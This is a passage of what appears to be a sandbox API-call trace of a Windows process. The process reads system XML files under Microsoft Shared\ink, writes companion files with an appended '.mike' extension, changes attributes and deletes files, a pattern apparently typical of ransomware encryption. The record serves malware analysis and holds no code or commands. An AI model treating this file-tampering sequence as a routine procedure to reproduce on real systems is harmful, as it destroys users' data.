[0045.895] GetFileType (hFile=0x264) returned 0x1 [0045.895] CloseHandle (hObject=0x264) returned 1 [0045.895] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml", lpFilePart=0x0) returned 0x52 [0045.895] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml", lpFilePart=0x0) returned 0x52 [0045.895] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aebcc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0045.895] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af120) returned 1 [0045.895] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0045.895] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0045.895] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.895] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml"), fInfoLevelId=0x0, lpFileInformation=0x21dc3c4 | out: lpFileInformation=0x21dc3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d281e4, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d281e4, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f6b5f83, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x269)) returned 1 [0045.896] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.896] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml", lpFilePart=0x0) returned 0x52 [0045.896] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.896] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml"), fInfoLevelId=0x0, lpFileInformation=0x21dc710 | out: lpFileInformation=0x21dc710*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d281e4, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d281e4, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f6b5f83, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x269)) returned 1 [0045.896] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.896] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml", lpFilePart=0x0) returned 0x52 [0045.896] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml.mike", lpFilePart=0x0) returned 0x57 [0045.896] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0045.896] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.896] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0045.896] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml", lpFilePart=0x0) returned 0x52 [0045.896] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml", lpFilePart=0x0) returned 0x52 [0045.896] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml", nBufferLength=0x105, lpBuffer=0x2aebac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml", lpFilePart=0x0) returned 0x52 [0045.896] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml.mike", lpFilePart=0x0) returned 0x57 [0045.897] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af010) returned 1 [0045.897] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af08c | out: lpFileInformation=0x2af08c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.897] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af00c) returned 1 [0045.897] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml.mike", lpFilePart=0x0) returned 0x57 [0045.897] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0045.897] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.897] GetFileType (hFile=0x264) returned 0x1 [0045.897] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0045.897] GetFileType (hFile=0x264) returned 0x1 [0045.897] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x0 [0045.897] WriteFile (in: hFile=0x264, lpBuffer=0x21dd6c4*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x21dd6c4*, lpNumberOfBytesWritten=0x2af02c*=0x220, lpOverlapped=0x0) returned 1 [0045.898] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0045.898] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml"), fInfoLevelId=0x0, lpFileInformation=0x21dd184 | out: lpFileInformation=0x21dd184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d281e4, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d281e4, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f6b5f83, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x269)) returned 1 [0045.898] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0045.898] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml", nBufferLength=0x105, lpBuffer=0x2aeaa8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml", lpFilePart=0x0) returned 0x52 [0045.898] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0045.898] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.899] GetFileType (hFile=0x264) returned 0x1 [0045.899] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0045.899] GetFileType (hFile=0x264) returned 0x1 [0045.899] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af02c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af02c*=0) returned 0x0 [0045.899] ReadFile (in: hFile=0x264, lpBuffer=0x21de808, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x21de808*, lpNumberOfBytesRead=0x2af038*=0x269, lpOverlapped=0x0) returned 1 [0045.929] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml.mike", lpFilePart=0x0) returned 0x57 [0045.929] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0045.930] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.930] GetFileType (hFile=0x264) returned 0x1 [0045.930] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0045.930] GetFileType (hFile=0x264) returned 0x1 [0045.930] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x220 [0045.930] WriteFile (in: hFile=0x264, lpBuffer=0x21e2550*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x21e2550*, lpNumberOfBytesWritten=0x2af02c*=0x270, lpOverlapped=0x0) returned 1 [0045.930] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeac0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml.mike", lpFilePart=0x0) returned 0x57 [0045.930] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefb4) returned 1 [0045.930] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.930] GetFileType (hFile=0x264) returned 0x1 [0045.930] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefb0) returned 1 [0045.930] GetFileType (hFile=0x264) returned 0x1 [0045.931] WriteFile (in: hFile=0x264, lpBuffer=0x21e5790*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x21e5790*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0045.932] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml", lpFilePart=0x0) returned 0x52 [0045.932] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml.mike", lpFilePart=0x0) returned 0x57 [0045.932] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0045.932] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe58e4be0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe58e4be0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5957000, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x490)) returned 1 [0045.932] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0045.932] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml", lpFilePart=0x0) returned 0x52 [0045.932] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml.mike", lpFilePart=0x0) returned 0x57 [0045.932] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.932] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x21e6fb0 | out: lpFileInformation=0x21e6fb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe58e4be0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe58e4be0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5957000, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x490)) returned 1 [0045.932] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.932] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml", lpFilePart=0x0) returned 0x52 [0045.932] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml", dwFileAttributes=0x80) returned 0 [0045.933] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml", lpFilePart=0x0) returned 0x52 [0045.933] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml.mike", lpFilePart=0x0) returned 0x57 [0045.933] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe0) returned 1 [0045.934] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af05c | out: lpFileInformation=0x2af05c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe58e4be0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe58e4be0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5957000, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x490)) returned 1 [0045.934] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefdc) returned 1 [0045.934] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml", lpFilePart=0x0) returned 0x52 [0045.934] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml.mike", lpFilePart=0x0) returned 0x57 [0045.934] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml.mike")) returned 1 [0045.936] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml", lpFilePart=0x0) returned 0x4f [0045.936] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml", lpFilePart=0x0) returned 0x4f [0045.936] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml", lpFilePart=0x0) returned 0x4f [0045.936] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0045.936] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0045.943] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adec8) returned 1 [0045.943] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml", nBufferLength=0x105, lpBuffer=0x2aead0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml", lpFilePart=0x0) returned 0x4f [0045.943] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefc4) returned 1 [0045.943] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.943] GetFileType (hFile=0x264) returned 0x1 [0045.943] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefc0) returned 1 [0045.943] GetFileType (hFile=0x264) returned 0x1 [0045.944] CloseHandle (hObject=0x264) returned 1 [0045.944] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml", lpFilePart=0x0) returned 0x4f [0045.944] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml", lpFilePart=0x0) returned 0x4f [0045.944] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aebcc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0045.944] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af120) returned 1 [0045.944] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0045.944] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0045.944] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.944] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml"), fInfoLevelId=0x0, lpFileInformation=0x21e91d0 | out: lpFileInformation=0x21e91d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d4e341, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d4e341, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f6dc0e1, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x40e8)) returned 1 [0045.944] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.944] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml", lpFilePart=0x0) returned 0x4f [0045.944] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.944] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml"), fInfoLevelId=0x0, lpFileInformation=0x21e9504 | out: lpFileInformation=0x21e9504*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d4e341, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d4e341, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f6dc0e1, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x40e8)) returned 1 [0045.944] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.944] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml", lpFilePart=0x0) returned 0x4f [0045.945] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml.mike", lpFilePart=0x0) returned 0x54 [0045.945] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0045.945] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml.mike" (normalized: "c:\\program files\\common 